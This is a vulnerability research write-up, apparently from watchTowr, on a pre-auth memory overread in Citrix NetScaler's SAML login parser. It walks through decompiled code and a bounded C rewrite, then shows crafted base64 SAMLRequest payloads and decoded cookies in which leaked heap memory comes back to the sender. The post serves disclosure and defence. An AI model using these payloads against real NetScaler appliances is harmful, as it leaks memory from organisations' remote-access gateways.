CitrixBleed To Infinity And Beyond (Citrix NetScaler Pre-Auth Memory Overread CVE-2026-8451)

Well, well, well - once again, the cat has dragged us in and spat us out.

Today, we find ourselves questioning the reality we sit within. Must it be so predictable, and why us? “But watchTowr, what do you mean?”

Well, if you’re here, you likely fit into one of the following categories:

  • A dear reader,
  • A group therapy accomplice
  • A Groundhog Day fan club member

Why? Because we once again find ourselves talking about Citrix NetScalers. Yes, that’s right, we’ve found another excuse to create memes and mock promise rings.

For those that don’t start violently retching when the phrase “Citrix NetScaler” is uttered, we have another word to whisper: “CitrixBleed”.

As many know, the term CitrixBleed now refers to not a single vulnerability, but an entire class of Memory Disclosure-esque vulnerabilities in Citrix NetScaler devices, many of which have played roles in breaches and incidents in recent memory.

For those new to this trauma, the following prior reading may be of interest:

“We told you so”, we want to scream.

Huh? Why? Because, we have constantly reiterated our concern that the Memory Disclosure-esque class of vulnerability appears to be endemic within Citrix NetScaler devices - to the point where we’ve now found further instances either by accident or while analyzing and reproducing another instance of the same vulnerability class in the same appliance a mere few months ago.

Yes, that’s right - today, a Secure By Design promise ring pledge commitment hall-of-famer is back to haunt us as Citrix has now publicly disclosed the zero-day Memory Disclosure vulnerability we reported in March 2026.

We’ve given up counting the numbers, and so we’ve decided to call this vulnerability “CitrixBleed To Infinity And Beyond”:

Referencing what we wrote previously, because it is demonstrably evergreen:

> However, what should be of concern is the bigger picture - the trend, which is very clearly suggesting that memory management continues to appear fragile within Citrix NetScaler appliances, to the extent that even accidentally misconfiguring an appliance can lead to the disclosure of leaked memory.

> It feels like we are playing catch with a highly-sensitive gun that continues to harm innocent bystanders - within, once again, what many will consider a highly-critical appliance and security control.

> Will we see another memory leak vulnerability in Citrix NetScaler? We have no idea. But if we were to meme…

What Is Citrix NetScaler and NetScaler Gateway?

Citrix NetScaler (formally rebranded, then un-rebranded, in the way that only enterprise networking vendors can truly pull off) is a family of application delivery controllers and VPN gateway appliances found in virtually every large enterprise network on the planet. NetScaler handles load balancing, SSL offloading, authentication, and remote access - and NetScaler Gateway specifically serves as the front door for thousands of organizations' remote access infrastructure.

It is, in other words, exactly the kind of product we love to look at, while also being a natural disaster.

What Is CVE-2026-8451?

Citrix eloquently describes CVE-2026-8451 as: “Insufficient input validation leading to memory overread”.

Naturally, they’ve assigned CVE-2026-8451 to the vulnerability and rated it a CVSS of 8.8. Of note is that for this vulnerability to be exploitable, matching CitrixBleed3?4?, the NetScaler appliance has to be configured as a SAML IDP.

Within their advisory, Citrix states the following products are affected:

  • NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
  • NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
  • NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
  • NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272

Let’s dive in.

Hunting (Unfortunately Not) Rare Vulnerabilities

It was a late night in Pallet Town, and we, the intrepid hero, were searching for rare Pokémon vulnerabilities in the long grass of the Citrix NetScaler.

Doing “what we do best”, back in March we found ourselves feverishly analyzing patches and changes to reproduce CVE-2026-3055 aka CitrixBleed4(?), affecting NetScalers configured as a SAML IdP.

With a NetScaler up and running, configured as a SAML IdP, we skimmed through the relevant attack surface. We say skimmed, because in reality, SAML itself doesn't expose a huge amount of functionality for us to poke and prod - effectively a handful of authentication endpoints, and not much else (intended, anyway).

Thus, it seemed natural to start at the beginning: /saml/login.

Anyone familiar with SAML will know that clients kick off authentication by submitting a base64-encoded XML document to an endpoint like this. Buried inside that XML document is an AuthnRequest, which describes everything the identity provider needs to know, including the issuer, destination, timestamps, and a handful of other attributes.

With nothing else to catch our attention, we decided to take what we were given and focus here.

As anyone who has spent time hunting vulnerabilities will tell you (after hopefully recovering), XML parsers are deceptively difficult to implement correctly. Even experienced developers (and others.. that sign pledges…) generally know better than to do anything other than rely on well-tested libraries.

Citrix, however, appears to have chosen a different path. To ensure allegiance to the pledge.

The result is delightful snippets like the following, taken from the code responsible for parsing XML attributes such as foo="bar":

cursor = <some string input>

whitespaceCharList = 0x100002600;

// Skip leading whitespace
for ( lookahead = (v32 + 28); ; lookahead++ )
{
    ch = *cursor;
    if ( ch > '=' )
        break;
    if ( !_bittest64(&whitespaceCharList, ch) )
    {
        if ( ch == '=' )
        {
            while ( 1 )
            {
                ch = *lookahead;
                if ( ch > 0x20 || !_bittest64(&whitespaceCharList, ch) )
                    break;
                ++lookahead;
            }
            cursor = lookahead;
        }
        break;
    }
    ++cursor;
}

// Determine how the value is quoted. This accepts both single and double quotes, or
// no quotes at all (in which case, the value is terminated by whitespace).
if ( ch == '\'' || ch == '"' )
{
    terminator = ch;
    first = *++cursor;
}
else
{
    terminator = ' ';
    first = ch;
}
if ( first == terminator )
    return 0xE0002;     // The value is empty.

// Now walk forward until we find the terminator.
scanPos = cursor;
while ( first != '\0' && first != '>' )
{
    scanPos++;
    first = *scanPos;
    if (first == terminator)
        break;
}

if ( scanPos == cursor )
    return 0xE0002;     // the value is empty.

out->value_ptr = cursor;
out->value_len = scanPos - cursor;

The first thing that probably jumps out is the slightly odd-looking _bittest64() call.

Fortunately, it isn't doing anything particularly exotic.

It simply checks whether a character belongs to a predefined set, encoded as bit positions within the constant 0x100002600. In practice, that means it matches the characters 0x09, 0x0A, 0x0D, and 0x20, which correspond to horizontal tab, line feed, carriage return, and space.

There is one subtle detail. ASCII values range from 0 to 255, while the lookup table is only 64 bits wide. The > 0x20 check exists to avoid indexing beyond the end of that table.

The comments should make the rest of the function fairly easy to follow. Its job is simply to locate the value portion of an XML attribute and return both a pointer to the value and its length.

It also looks... a little questionable. If your promise ring isn’t reverberating yet, you should probably charge it. As we’ve regularly seen and been forced to deal with, string parsing code has a habit of hiding subtle bugs - and surprise, this implementation has a few characteristics that immediately made us suspicious.

For example, there are no obvious bounds checks. If the input is malformed enough, it looks entirely possible for the parser to read past the end of the input buffer. What happens if an attribute value is never terminated?

But things get even stranger when you look at the parser's termination logic.

Throughout most of the function, _bittest64() is used to recognize the whitespace characters that delimit tokens. However, there is one special case: unquoted attribute values.

In that path, the whitespace set is not consulted at all. The scanning loop only stops when it encounters a null byte, a closing >, or the single terminator character chosen earlier: the matching quote for a quoted value, or a plain space for an unquoted one. A newline after an unquoted value therefore does not end it.

That difference might seem insignificant, but it turns out to matter quite a bit (no way!).
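To make the terminator logic concrete, here is an added example (our illustration, not code from the post or from Citrix): a C model of the decompiled scan next to a bounded rewrite, run over the page's unquoted `=11\nid=22>` input and over a constructed array whose bytes past the 28-byte request stand in for memory beyond the request buffer. The PV_TRUNCATED code, the sample bytes and the wrapper names are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Status codes: 0xE0002 is the "empty value" code seen in the decompilation;
 * PV_TRUNCATED is a hypothetical code introduced here for the hardened path. */
enum { PV_OK = 0, PV_EMPTY = 0xE0002, PV_TRUNCATED = 0xE0003 };

struct attr_value { const char *ptr; size_t len; };

/* The whitespace set from the decompilation: 0x100002600 has bits 9, 10, 13
 * and 32 set, i.e. \t \n \r and space. Only bytes below 64 may index it. */
#define WS_MASK 0x100002600ULL
static int is_ws(unsigned char c) { return c < 64 && ((WS_MASK >> c) & 1u); }

/* Model of the decompiled scan. It is handed no length, so the walk is bounded
 * only by a NUL, a '>' or the terminator it picked: the matching quote, or a
 * single space for an unquoted value. A newline does not end an unquoted value. */
unsigned parse_value_unsafe(const char *cursor, struct attr_value *out) {
    unsigned char ch = (unsigned char)*cursor;
    while (is_ws(ch)) ch = (unsigned char)*++cursor;             /* leading whitespace */
    if (ch == '=') { do ch = (unsigned char)*++cursor; while (is_ws(ch)); }
    unsigned char terminator = ' ';
    if (ch == '\'' || ch == '"') { terminator = ch; ch = (unsigned char)*++cursor; }
    if (ch == terminator) return PV_EMPTY;
    const char *scan = cursor;
    while (ch != '\0' && ch != '>') {                            /* no buffer end in sight */
        ch = (unsigned char)*++scan;
        if (ch == terminator) break;
    }
    if (scan == cursor) return PV_EMPTY;
    out->ptr = cursor;
    out->len = (size_t)(scan - cursor);
    return PV_OK;
}

/* Same grammar, hardened: every read is checked against buflen, an unquoted value
 * ends at any whitespace byte, and an unclosed quote is an error, not a scan to NUL. */
unsigned parse_value_safe(const char *buf, size_t buflen, size_t pos, struct attr_value *out) {
    while (pos < buflen && is_ws((unsigned char)buf[pos])) pos++;
    if (pos < buflen && buf[pos] == '=') {
        pos++;
        while (pos < buflen && is_ws((unsigned char)buf[pos])) pos++;
    }
    if (pos >= buflen) return PV_TRUNCATED;                      /* '=' was the last byte */
    unsigned char quote = 0;
    if (buf[pos] == '\'' || buf[pos] == '"') quote = (unsigned char)buf[pos++];
    size_t start = pos;
    while (pos < buflen && buf[pos] != '\0' && buf[pos] != '>') {
        unsigned char c = (unsigned char)buf[pos];
        if (quote ? c == quote : is_ws(c)) break;
        pos++;
    }
    if (quote && (pos >= buflen || (unsigned char)buf[pos] != quote)) return PV_TRUNCATED;
    if (pos == start) return PV_EMPTY;
    out->ptr = buf + start;
    out->len = pos - start;
    return PV_OK;
}

/* Convenience wrappers: value length on success, 0 on any error. */
size_t unsafe_value_len(const char *s) {
    struct attr_value v = { 0, 0 };
    return parse_value_unsafe(s, &v) == PV_OK ? v.len : 0;
}
size_t safe_value_len(const char *s, size_t n) {
    struct attr_value v = { 0, 0 };
    return parse_value_safe(s, n, 0, &v) == PV_OK ? v.len : 0;
}

/* Constructed sample: a request that ends right after "=", followed in the same
 * array by bytes standing in for whatever sits past the request buffer (a marker
 * and then NUL), so the model's over-read stays inside memory this program owns. */
#define REQ "AssertionConsumerServiceURL="
#define REQ_LEN (sizeof REQ - 1)                                  /* 28 bytes */
static const char SAMPLE[] = REQ "\xef\xbe\xad\xde" "STALE-HEAP-DATA";

/* How many bytes from beyond the request the faithful model hands back. */
size_t demo_overread_len(void) {
    struct attr_value v = { 0, 0 };
    if (parse_value_unsafe(SAMPLE + REQ_LEN - 1, &v) != PV_OK) return 0;
    return (size_t)((v.ptr + v.len) - (SAMPLE + REQ_LEN));
}

/* What the hardened parser does with the same bytes once it knows the real length. */
unsigned demo_safe_status(void) {
    struct attr_value v = { 0, 0 };
    return parse_value_safe(SAMPLE, REQ_LEN, REQ_LEN - 1, &v);
}

int main(void) {
    printf("unquoted \"=11\\nid=22>\": model keeps %zu bytes, hardened keeps %zu\n",
           unsafe_value_len("=11\nid=22>"), safe_value_len("=11\nid=22>", 10));
    printf("past the request end: model leaks %zu bytes, hardened status 0x%X\n",
           demo_overread_len(), demo_safe_status());
    return 0;
}
```

The model returns the same `11 id=22` value the log shows, and 19 bytes of the constructed "stale" region; the bounded version stops at the newline and refuses the request whose last byte is the `=`.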

A Wild NetScaler Appears! watchTowr used “Mean Look To See If It Falls Over”.

Having seen the quality of XML parsers in general, let alone Citrix’s track record that we’ve already discussed, we did what anyone would do - we let our small pets walk across our keyboards, and watched for unexpected intended functionality.

Fortunately, NetScaler makes this fairly easy (we supplied the pets).

A quick shell command drops you into the underlying operating system, where you can simply tail the relevant log file:

/var/log/ns.log

That gives us a front-row seat to exactly how the parser interprets our input.

We'll start with a minimal SAML AuthnRequest. It gives us a clean baseline before we begin progressively breaking things and observing how the parser responds:

<samlp:AuthnRequest 
    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" 
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" 
    ID="_99d3e71118f42305e05acb14ad0bd917" 
    Version="2.0" 
    ProviderName="SP test" 
    Destination="http://idp.example.com/SSOService.php" 
    ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" 
    AssertionConsumerServiceURL="http://sp.example.com/demo1/index.php?acs">
    <saml:Issuer>http://sp.example.com/demo1/metadata.php</saml:Issuer>
    <samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress" AllowCreate="true"/>
    <samlp:RequestedAuthnContext Comparison="exact">
    <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
    </samlp:RequestedAuthnContext>
</samlp:AuthnRequest>

After base64-encoding the request and sending it, we keep one eye on the logs and one eye on the debugger. As expected, NetScaler parses each of the values correctly:

POST /saml/login HTTP/1.1
Host: all-ur-boxen.com
Content-Length: 1090

SAMLRequest=[base64-encoded AuthnRequest from above; blob elided]

The HTTP response is just a 302 (honestly, its contents are not particularly interesting, so we have omitted them):

HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src http://localhost:* 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action  'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a href="/vpn/index.html"><span id="here"></span></a><span id="Trailing phrase after here"></span></body></html>

And in our friendly logs….:

AuthnReq start tag parsed, id=<_99d3e71118f42305e05acb14ad0bd917>, 
acs=<http://sp.example.com/demo1/index.php?acs>, forceAuth=<0>, binding=<POST>, 
following data  "    ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"        AssertionConsumerServiceURL=""

So far, nothing particularly surprising. NetScaler successfully extracts the ID and AssertionConsumerServiceURL attributes, while ForceAuthn falls back to its default value.

However, we were still deeply suspicious of the attribute parser. Earlier, we pointed out that unquoted attribute values are terminated differently from quoted ones. With not much faith left in humanity, we wondered what would happen if we used a newline to terminate one.

There was only one way to find out - yes, the pets were asked to walk across our keyboards, again.

<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22>
<saml:Issuer>watchtowr</saml:Issuer>
</samlp:AuthnRequest>

This time, we've replaced the space after AssertionConsumerServiceURL with a newline.

Once again, we base64-encode the document and POST it to /saml/login:

POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 190

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBWZXJzaW9uPSIyLjAiIEFzc2VydGlvbkNvbnN1bWVyU2VydmljZVVSTD0xMQppZD0yMj4KPHNhbWw6SXNzdWVyPndhdGNodG93cjwvc2FtbDpJc3N1ZXI%2bCjwvc2FtbHA6QXV0aG5SZXF1ZXN0Pg==

The response is practically the same as before:

HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD0yMiZiaW5kPXBvc3QmQUNTVVJMPTExCmlkPTIyAA==;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src http://localhost:* 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action  'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a href="/vpn/index.html"><span id="here"></span></a><span id="Trailing phrase after here"></span></body></html>

With the log file… not being so coy:

AuthnReq start tag parsed, id=<22>, acs=<11 id=22>, forceAuth=<0>, binding=<Unknown>, 
following data  Version="2.0" AssertionConsumerServiceURL=11 id=22> <saml:Issuer>watchtowr</saml:Issuer> </samlp:Au"

That's... interesting.

You might have to read the log twice before it jumps out at you.

Notice that the acs value has been parsed as:

11 id=22

That is clearly wrong. Looking at the XML we sent, the value should simply be 11.

Instead, the parser has read past the correct end of the attribute, failed to recognize the newline as a valid terminator (exactly as we suspected), and continued consuming input until it eventually encountered the > terminating the AuthnRequest start tag.

Then, things became even more interesting.

As we saw earlier, this XML parser is surprisingly relaxed about what constitutes a valid closing tag. In particular, it is happy to accept a < as the terminator for an AuthnRequest start tag instead of the expected >.

That means we can take things one step further. If we terminate both AssertionConsumerServiceURL and ID with newlines, and leave the opening AuthnRequest tag unclosed, we end up with the following request:

<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=
id=
<saml:Issuer>watchtowr</saml:Issuer>
</samlp:AuthnRequest>

Let’s base64 and send it on its way:

POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 180

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBWZXJzaW9uPSIyLjAiIEFzc2VydGlvbkNvbnN1bWVyU2VydmljZVVSTD0KaWQ9CjxzYW1sOklzc3Vlcj53YXRjaHRvd3I8L3NhbWw6SXNzdWVyPgo8L3NhbWxwOkF1dGhuUmVxdWVzdD4=

The response is, again, uninteresting:

HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD08c2FtbDpJc3N1ZXImYmluZD1wb3N0JkFDU1VSTD1pZD0KPHNhbWw6SXNzdWVyAA==;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src http://localhost:* 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action  'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a href="/vpn/index.html"><span id="here"></span></a><span id="Trailing phrase after here"></span></body></html>

.. but the generated log is far from boring:

AuthnReq start tag parsed, id=<<saml:Issuer>, acs=<id= <saml:Issuer>, 
forceAuth=<0>, binding=<Unknown>, following data  Version="2.0" AssertionConsumerServiceURL= id= <saml:Issuer>watchtowr</saml:Issuer> </samlp:AuthnRe"

So far, our theory holds up.

The AssertionConsumerServiceURL value is not terminated at the newline. Instead, the parser keeps reading until it encounters the > from the closing Issuer tag. The ID attribute behaves exactly the same way.

At this point, it is pretty clear that we have an overread. The parser is reading well beyond the intended bounds of each attribute value. We are still only reading XML that happens to be present in the input buffer, but the parser is clearly consuming far more data than it should.

That is already interesting, but the obvious question is: “Do we lease our bug-hunting pets?” Sometimes.

The other question you may be inclined to ask may resemble the following: “Where does all of this overread data end up?”

To answer that, we need to look at what this function actually produces.

On success, it returns an HTTP response containing an NSC_TASS cookie. Among other things, this cookie stores the ID and AssertionConsumerServiceURL values that were parsed from the incoming XML request:

NSC_TASS=YXNkZgBJRD08c2FtbDpJc3N1ZXImYmluZD1wb3N0JkFDU1VSTD1pZD0KPHNhbWw6SXNzdWVyAA==

This decodes to:

00000000  61 73 64 66 00 49 44 3d  3c 73 61 6d 6c 3a 49 73  |asdf.ID=<saml:Is|
00000010  73 75 65 72 26 62 69 6e  64 3d 70 6f 73 74 26 41  |suer&bind=post&A|
00000020  43 53 55 52 4c 3d 69 64  3d 0a 3c 73 61 6d 6c 3a  |CSURL=id=.<saml:|
00000030  49 73 73 75 65 72 00                              |Issuer.|

asdf is simply the configured provider name. The interesting part is everything that follows.

You can see the values parsed from our XML request being embedded directly into the cookie. The ID field now contains <saml:Issuer, and the ACSURL field has similarly consumed data well beyond the intended attribute value.

Shock - we are once again miserable about the world (we say, fiddling with our promise rings).

We’ve so far demonstrated what nobody needed a crystal ball to predict - the NetScaler appliance is willing to return data it never should have associated with those attributes. So far, though, the overread is still confined to our own request buffer.

The next challenge is obvious: instead of reading within the request, can we make it read beyond the end of the request?

Reading Into The Unknown

We spent quite a while trying to figure out how to push the parser past the end of the request buffer. After a healthy amount of trial and error, we concluded that our login request to /saml/login needed to satisfy a few conditions:

  • It must contain both a <samlp:AuthnRequest> and a corresponding </samlp:AuthnRequest>. We can't simply leave the request unterminated.
  • It must contain a valid <saml:Issuer>watchtowr</saml:Issuer>.
  • It must contain either an AssertionConsumerServiceURL= or ID attribute terminated by a newline, or not terminated at all.

At first glance, those requirements seem mutually exclusive.

They aren't.

By this point, we'd already learned just how forgiving the parser was. We'd shown that the opening AuthnRequest tag didn't actually need a closing >, but we also discovered something even stranger: the parser was surprisingly relaxed about element nesting.

For example:

<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22
</samlp:AuthnRequest>
<saml:Issuer>watchtowr</saml:Issuer>

Here we’ve got the same request as before - but this time, the Issuer is moved outside the AuthnRequest.

Any sane parser would reject this, but we’re not dealing with sanity. Of course, the NetScaler appliance actually accepts it.

AuthnReq start tag parsed, id=<22 <saml:Issuer>, acs=<11 id=22 <saml:Issuer>, forceAuth=<0>, binding=<Unknown>

One important detail is that this only works if the opening AuthnRequest tag is left unterminated. If it is closed normally, the parser rejects the document, strongly suggesting the behavior we’re observing is tied to the parser's attribute-handling logic.

Once we realized that, we started experimenting a little more. It turns out the parser is surprisingly tolerant of attribute ordering as well. For example:

<samlp:AuthnRequest
<saml2:issuer>watchtowr</saml2:issuer>
</samlp:AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL="22"

This yields a successful response - although not all of the extracted details are correct:

AuthnReq start tag parsed, id=<>, acs=<22>, forceAuth=<0>, binding=<Unknown>

You might note that the acs value returned is correct - 22 - because we’ve carefully enclosed the value in the request in quotes.

What happens if we can make the parser overread past the end of the request buffer instead?

<samlp:AuthnRequest
<saml2:issuer>watchtowr</saml2:issuer>
</samlp:AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL=

And in our favorite log…:

AuthnReq start tag parsed, id=<>, acs=<▒^M▒ᆳ▒="2.0" id="11" 
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php</saml:Issuer>, 
forceAuth=<0>, binding=<Unknown>

OH HO HO. Finally, we’re almost there!

The parser is no longer just reading extra XML. It's pulling arbitrary binary data from beyond the end of the XML buffer and happily appending it to the parsed value.

The only question left is whether that value makes it all the way back to us via the NSC_TASS cookie we looked at earlier:

NSC_TASS=YXNkZgBJRD0mYmluZD1wb3N0JkFDU1VSTD3wDZDvvq3ePSIyLjAiCmlkPSIxMSIKQXNzZXJ0aW9uQ29uc3VtZXJTZXJ2aWNlVVJMPSIyMiLvvq3ebXBsZS5jb20vZGVtbzEvaW5kZXgucGhwPC9zYW1sOklzc3VlcgA=

And decoded…:

00000000  61 73 64 66 00 49 44 3d  26 62 69 6e 64 3d 70 6f  |asdf.ID=&bind=po|
00000010  73 74 26 41 43 53 55 52  4c 3d f0 0d 90 ef be ad  |st&ACSURL=......|
00000020  de 3d 22 32 2e 30 22 0a  69 64 3d 22 31 31 22 0a  |.="2.0".id="11".|
00000030  41 73 73 65 72 74 69 6f  6e 43 6f 6e 73 75 6d 65  |AssertionConsume|
00000040  72 53 65 72 76 69 63 65  55 52 4c 3d 22 32 32 22  |rServiceURL="22"|
00000050  ef be ad de 6d 70 6c 65  2e 63 6f 6d 2f 64 65 6d  |....mple.com/dem|
00000060  6f 31 2f 69 6e 64 65 78  2e 70 68 70 3c 2f 73 61  |o1/index.php</sa|
00000070  6d 6c 3a 49 73 73 75 65  72 00                    |ml:Issuer.|

Finally!

Take a look at the ACSURL value. It now contains binary data that should never have been returned to us, including the unmistakable 0xdeadbeef fill pattern.

Our overread has worked.

The parser has read beyond the end of the XML buffer, and we've successfully tricked NetScaler into returning memory that was never supposed to leave the process. Completely unpredictably.

It’s never done that before (lol)

One thing we’re keen to note: in contrast to the original CVE-2026-0050, in which kilobytes of binary data can be leaked, this overread will terminate the out-of-bounds read when various control characters are read, such as NULL (or even >).

In practice, we found that by varying the request length, we could consistently squeeze a few bytes out of the server:

c:\>python watchTowr-vs-Netscaler-CVE-2026-8451.py https://192.168.80.125
